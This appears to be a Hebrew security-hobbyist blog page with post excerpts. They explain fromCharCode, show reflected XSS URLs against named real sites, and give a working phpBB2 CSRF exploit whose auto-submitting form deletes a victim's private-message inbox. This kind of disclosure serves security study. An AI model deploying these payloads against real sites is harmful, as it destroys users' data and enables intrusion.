גלעד שאל בפוסט הקודם למה כתבתי כך את הקוד אז נכתבתי תשובה קצת מפורטת fromCharCode היא פונקצית JavaScript. הפונקציה נועדה כדי להפוך (לתרגם) ערכי Unicode ל-string. הרעיון הוא שאם נזין לפונקציה סדרת ערכים מספריים, היא תחזיר חזרה את התווים התואמים להם בטבלת ASCII. הסינטקס של הפונקציה הזו הוא תמיד String.fromCharCode() בתוך הסוגריים יופיעו מספרים שיומרו [...]
זה באמת הצחיק אותי: http://www.xssing.com/index.php?x=%27%22%3Cscript%3Ealert%28String.fromCharCode(88,83,83)%29%3C/script%3E XSS באתר של XSS
לא מזמן, מצאתי XSS ב-ns.com זה הצחיק אותי כיוון שהוא ממוקם בדף מאובטח הנה: https://secure.ns.com/opensrs2/manage.cgi?reg_domain=%27%22%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E Hacker-Safe זה שירות שמספקת חברת Scan-Alert שאמור להתריע על בעיות אבטחה באתר האינטרנט שחבר בשירות. הרעיון הוא שהאתרים עוברים סריקת אבטחה כלשהיא ברמה יומית ואם נמצאת בהם פרצת אבטחה – היא מדווחת כדי שיתקנו אותה. הלוגו של Hacker-Safe אמור [...]
אז איך בילית את יום ההולדת שלי? דבר אחד אפשר להגיד – אני לא אשכח את יום ההולדת הזה. זה התחיל במבחן לא מוצלח בדיסקרטית. לא משנה מה עשיתי – לא הצלחתי להתרכז. בטוח יהיה צורך במבחן חוזר. יום ההולדת נמשך במסעדה שהלכנו אליה אשתי ואני. המסעדה נקרא גיליס והיא ממוקמת בנמל ת"א. היה [...]
אקספלויט בן פחות מחודש, עדיין עובד ברוב המערכות (כולל בפורומי אבטחת המידע פה, אז תזהרו לא ללחוץ על לינקים שאתם מקבלים מאנשים שאתם לא סומכים עליהם ). קוד: <html> <head> </head> <body onLoad=javascript:document.xsrf.submit()> <form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post" name="xsrf"> <input type="hidden" name="mode" value="" /> <input type="hidden" name="deleteall" value="true" /> <input type="hidden" name="confirm" value="Yes"> </body> [...]